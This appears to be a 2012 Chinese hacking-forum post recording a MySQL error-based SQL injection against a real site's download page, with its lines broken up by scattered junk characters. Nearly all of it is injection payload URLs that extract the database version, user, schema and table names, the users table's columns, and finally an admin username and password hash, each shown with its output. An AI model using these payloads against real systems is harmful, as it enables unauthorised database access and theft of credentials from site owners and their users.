找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1838|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-016661 c) A( M0 w+ e9 ?2 l6 r1 ?

# l/ L$ f9 M% a' {2 ~" l8 F3 Q. F之前想找个测试 没想到这有 可以测试下做个记录而已
. P( X+ l1 _! f! ?' g% f$ N+ j/ Q7 `. m
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003. b0 E: e# l4 O* ^, ]7 [

( S. ]( O% r. T/ X; c/data0/htdocs/leqi_new/app/myapp.php
9 ~: U) P, h+ r. e1 n+ Q0 ]( p7 U2 }+ q+ B: x& x
或者$ Q" ?  o7 |% ?0 }  i- T. @

; M+ v% C3 e% K3 s5 W: k+ ]+ j# |/**********version()**********/ 5.1.49-log8 L! d/ U. c5 L2 m, |' Z6 |
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 l. I7 s4 L; B/ o* l+ ^
/ K( F" R. m* F4 O2 ?' v
/**********user()**********/  
% D" u4 ]% r/ }http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: p& o7 B# N* @: K# L7 {  V9 B. Q* C: H% U2 Y4 a
/**********database()**********/  leqi
  z: F" j! j  [" g& g3 X& \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 Q+ ]' W" L& q% Y. W% u! l" g* S) q  P& w3 E3 |- x" F
/**********limit依次递归爆库**********/
) q; e! V3 f7 L6 Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 R- j) x5 I9 q7 B
information_schema
. P3 U1 t6 k' r2 u& fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. Z: O5 b+ R) B2 @5 S( g+ T: s
leqi
/ C: ~/ [2 ?4 j7 D# uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003( J6 v4 F, f, ^- f! d9 _
test, ]; Z% y" b' t
/ ~& p0 N3 w2 O2 W
/**********limit依次递归爆表名**********/! R- J# A( `: y5 K. l' Q5 c/ R
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% K: y$ @( r! Z# g. X8 g' Vusers9 n4 }8 L4 {9 q5 Q8 ?
6 p$ d$ G0 p* s& H! h; K! q
/**********limit依次递归爆字段名**********/
/ L# ^. }8 O# X- A2 Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" @! I, Z7 z4 A; q
user_id,username,nickname,passwd,group_id* \  R0 r- `  Q6 |% p6 Y/ V
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
+ X6 ~/ n  q  k* }7 o% s& }0 w/wapc/5000_0005_003
' H1 Q0 y4 c' h" a7 q7 l! G11 21
, C% a" d* l0 v2 p# M1 ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23+ [* t, m# _' \# ^$ g, A% ^5 ]( p
/wapc/5000_0005_003
8 d) t* e4 Z( y$ P, n11 341 351 3614 Z  K8 }5 x2 \; }
/**********爆数据**********/
4 Q, J( M4 V7 ]+ x8 Ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, O; y1 y! y! i) S) g) Fadmin
1 X$ Z% `6 G& m* D( Q( L1 Jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% r/ d! b+ c, o! k8 b6a8b4574ca231eb8bd52764d4978ffcd4 [4 ]6 s/ T6 C9 ~2 m" U

2 G# `) `# w1 Y- }* M2 }) z ( m0 H, m) m9 ^. V( Z, V$ A' ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表